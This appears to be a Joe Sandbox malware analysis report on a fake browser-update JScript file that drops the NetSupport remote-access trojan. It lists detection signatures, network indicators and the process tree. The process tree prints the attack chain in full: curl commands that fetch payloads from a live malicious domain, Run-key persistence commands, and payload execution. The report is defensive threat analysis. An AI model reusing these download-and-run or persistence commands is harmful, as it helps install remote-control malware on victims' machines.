Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Browser_update16.0.5836.js

Overview

General Information

Sample Name:Browser_update16.0.5836.js
Analysis ID:1284202
MD5:8fb80e0a6f0c305371b8dc11db0c1552
SHA1:6a526ca78d175b5ec46fd4dd5fdc3f0591cb4eb7
SHA256:734666652f013df6bb435fe22fdd811274efb8e09e3fef9a2495396319d1d1e5
Tags:94-158-247-23jsnetsupport
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Command shell drops VBS files
Uses cmd line tools excessively to alter registry or file data
Uses known network protocols on non-standard ports
Queries the volume information (name, serial number etc) of a device
Drops PE files to the application program directory (C:\ProgramData)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Yara detected NetSupport remote tool
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7060 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Browser_update16.0.5836.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 7140 cmdline: "C:\Windows\System32\cmd.exe" /c C://ProgramData//wtgfOhpYJsY.bat MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 3408 cmdline: cmd.exe /c C:\ProgramData\sett.bat" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • curl.exe (PID: 4988 cmdline: curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "C:\ProgramData\lolo.7z" MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      • cmd.exe (PID: 6884 cmdline: cmd.exe /c C:\ProgramData\7z.bat" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • curl.exe (PID: 6860 cmdline: curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe" MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      • cmd.exe (PID: 5976 cmdline: cmd.exe /c C:\ProgramData\qweq.bat" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • curl.exe (PID: 5100 cmdline: curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat" -o "C:\ProgramData\qweq.bat" MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
        • reg.exe (PID: 5384 cmdline: reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" MD5: E3DACF0B31841FA02064B4457D44B357)
        • reg.exe (PID: 808 cmdline: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • cmd.exe (PID: 5836 cmdline: cmd.exe /c C:\ProgramData\qweq.bat" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • xcopy.exe (PID: 5396 cmdline: xcopy /h /y 7zz.exe C:\ProgramData\ MD5: 6BC7DB1465BEB7607CBCBD7F64007219)
        • cmd.exe (PID: 5408 cmdline: cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\ MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • 7zz.exe (PID: 3320 cmdline: C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\ MD5: 42BADC1D2F03A8B1E4875740D3D49336)
        • timeout.exe (PID: 3344 cmdline: TIMEOUT /T 7 MD5: EB9A65078396FB5D4E3813BB9198CB18)
        • cmd.exe (PID: 3724 cmdline: cmd /c C:\ProgramData\client32.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • client32.exe (PID: 5584 cmdline: C:\ProgramData\client32.exe MD5: F70B67C2B3204B7DDD8B755799CCCFF0)
        • reg.exe (PID: 5600 cmdline: reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" MD5: E3DACF0B31841FA02064B4457D44B357)
        • reg.exe (PID: 5256 cmdline: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f MD5: E3DACF0B31841FA02064B4457D44B357)
  • client32.exe (PID: 3308 cmdline: "C:\ProgramData\client32.exe" MD5: F70B67C2B3204B7DDD8B755799CCCFF0)
  • client32.exe (PID: 4956 cmdline: "C:\ProgramData\client32.exe" MD5: F70B67C2B3204B7DDD8B755799CCCFF0)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\ProgramData\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\ProgramData\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\ProgramData\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\ProgramData\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000015.00000000.529209047.0000000000BE2000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000015.00000002.530744796.00000000111E2000.00000004.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000015.00000002.530355277.0000000000BE2000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000012.00000002.995634000.00000000111E2000.00000004.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000012.00000002.995977904.000000006FA00000.00000002.00000001.01000000.0000000D.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 25 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      18.2.client32.exe.be0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        18.2.client32.exe.73b70000.6.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          18.2.client32.exe.111b8c68.2.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                            18.2.client32.exe.111b8c68.2.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              21.2.client32.exe.be0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 32 entries

                                Sigma Signatures

                                No Sigma rule has matched

                                Snort Signatures

                                Timestamp:192.168.2.68.8.8.849448532854911 08/02/23-10:16:17.568207
                                SID:2854911
                                Source Port:49448
                                Destination Port:53
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.6185.9.147.166497054432854914 08/02/23-10:16:17.742725
                                SID:2854914
                                Source Port:49705
                                Destination Port:443
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.694.158.247.234971050502827745 08/02/23-10:19:37.575836
                                SID:2827745
                                Source Port:49710
                                Destination Port:5050
                                Protocol:TCP
                                Classtype:A Network Trojan was detected

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus detection for URL or domain
                                Source: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exeAvira URL Cloud: Label: malware
                                Source: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7zAvira URL Cloud: Label: malware
                                Source: http://94.158.247.23/fakeurl.htmAvira URL Cloud: Label: malware
                                Source: https://magydostravel.com/cdn/zwmrqqgqnaww.phpAvira URL Cloud: Label: malware
                                Source: https://magydostravel.com/cdn/91c818ee6e9ec29f8c1.phpAvira URL Cloud: Label: malware
                                Source: https://magydostravel.com/Avira URL Cloud: Label: malware
                                Multi AV Scanner detection for domain / URL
                                Source: magydostravel.comVirustotal: Detection: 7%Perma Link
                                Source: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exeVirustotal: Detection: 10%Perma Link
                                Source: C:\ProgramData\7zz.exeFile opened: C:\ProgramData\msvcr100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 185.9.147.166:443 -> 192.168.2.6:49705 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.6:49706 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.6:49707 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.6:49708 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.6:49709 version: TLS 1.2
                                Source: Binary string: msvcr100.i386.pdb source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.996039604.000000006FA21000.00000020.00000001.01000000.0000000C.sdmp, client32.exe, 00000014.00000002.514239089.000000006FA21000.00000020.00000001.01000000.0000000C.sdmp, client32.exe, 00000015.00000002.531133820.000000006FA21000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995594337.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513657390.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.530688128.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995977904.000000006FA00000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.994296393.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000012.00000000.509036667.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000014.00000000.511172990.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000014.00000002.512939596.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000015.00000000.529209047.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000015.00000002.530355277.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, client32.exe.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: 7zz.exe, 0000000F.00000003.494480139.0000000002773000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.996230753.0000000073B72000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000014.00000002.514500269.0000000073B72000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000015.00000002.531560784.0000000073B72000.00000002.00000001.01000000.0000000A.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995977904.000000006FA00000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: 7zz.exe, 0000000F.00000003.494480139.0000000002773000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.996179417.000000006FBD5000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000014.00000002.514448933.000000006FBD5000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000015.00000002.531514619.000000006FBD5000.00000002.00000001.01000000.0000000B.sdmp, pcicapi.dll.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995594337.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513657390.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.530688128.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0040B174 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,AreFileApisANSI,FindFirstFileA,15_2_0040B174
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0040B6E9 __EH_prolog,FindFirstFileW,GetCurrentDirectoryW,15_2_0040B6E9

                                Networking

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\wscript.exeDomain query: mangoairsoft.com
                                Source: C:\Windows\System32\wscript.exeDomain query: magydostravel.com
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.127.230.147 443Jump to behavior
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.9.147.166 443Jump to behavior
                                Snort IDS alert for network traffic
                                Source: TrafficSnort IDS: 2854911 ETPRO TROJAN Fake Browser Update Domain in DNS Lookup 192.168.2.6:49448 -> 8.8.8.8:53
                                Source: TrafficSnort IDS: 2854914 ETPRO TROJAN Fake Browser Update Domain in TLS SNI 192.168.2.6:49705 -> 185.9.147.166:443
                                Source: TrafficSnort IDS: 2827745 ETPRO TROJAN NetSupport RAT CnC Activity 192.168.2.6:49710 -> 94.158.247.23:5050
                                Uses known network protocols on non-standard ports
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 5050 -> 49710
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 5050 -> 49710
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5050
                                Source: Joe Sandbox ViewASN Name: DHUBRU DHUBRU
                                Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 51.142.119.24 51.142.119.24
                                Source: global trafficHTTP traffic detected: GET /cdn/91c818ee6e9ec29f8c1.php HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: magydostravel.com
                                Source: global trafficHTTP traffic detected: GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?169173 HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: mangoairsoft.comConnection: Keep-Alive
                                Source: global trafficTCP traffic: 192.168.2.6:49710 -> 94.158.247.23:5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995977904.000000006FA00000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995977904.000000006FA00000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.drString found in binary or memory: http://%s/testpage.htm
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995977904.000000006FA00000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995594337.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513657390.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.530688128.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drString found in binary or memory: http://127.0.0.1
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995594337.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513657390.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.530688128.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: client32.exe, 00000012.00000002.994954497.0000000004190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.247.23/fakeurl.htm
                                Source: 7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                                Source: 7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                                Source: wscript.exe, 00000000.00000003.475773072.0000022C2132D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.512657860.0000022C2132D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.510707814.0000022C2132C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                Source: 7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                                Source: 7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                                Source: 7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: 7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                                Source: 7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                                Source: 7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.519217892.00000000063D8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.518787971.0000000001494000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995170819.00000000063A0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.517580379.0000000001494000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.519321530.0000000006391000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.520929196.00000000063CD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.515855424.00000000063C6000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.515639952.00000000063CD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995594337.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000012.00000003.519483099.00000000063A0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.518650575.00000000063D8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.519093088.00000000063CD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.519806744.00000000063C3000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.518492105.00000000063CD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.519937714.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.520092269.00000000063C8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.514672344.00000000063A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.574518921.000000000639D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.514974379.00000000063A7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.515518148.00000000063C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995594337.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513657390.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.530688128.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: 7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://ocsp.comodoca.com0
                                Source: 7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://ocsp.sectigo.com0
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drString found in binary or memory: http://ocsp.thawte.com0
                                Source: 7zz.exe, 0000000F.00000003.494480139.0000000002773000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: 7zz.exe, 0000000F.00000003.494480139.0000000002773000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drString found in binary or memory: http://s2.symcb.com0
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drString found in binary or memory: http://sf.symcb.com/sf.crl0f
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drString found in binary or memory: http://sf.symcb.com/sf.crt0
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drString found in binary or memory: http://sf.symcd.com0&
                                Source: 7zz.exe, 0000000F.00000003.494480139.0000000002773000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: 7zz.exe, 0000000F.00000003.494480139.0000000002773000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: 7zz.exe, 0000000F.00000003.494480139.0000000002773000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drString found in binary or memory: http://sv.symcd.com0&
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
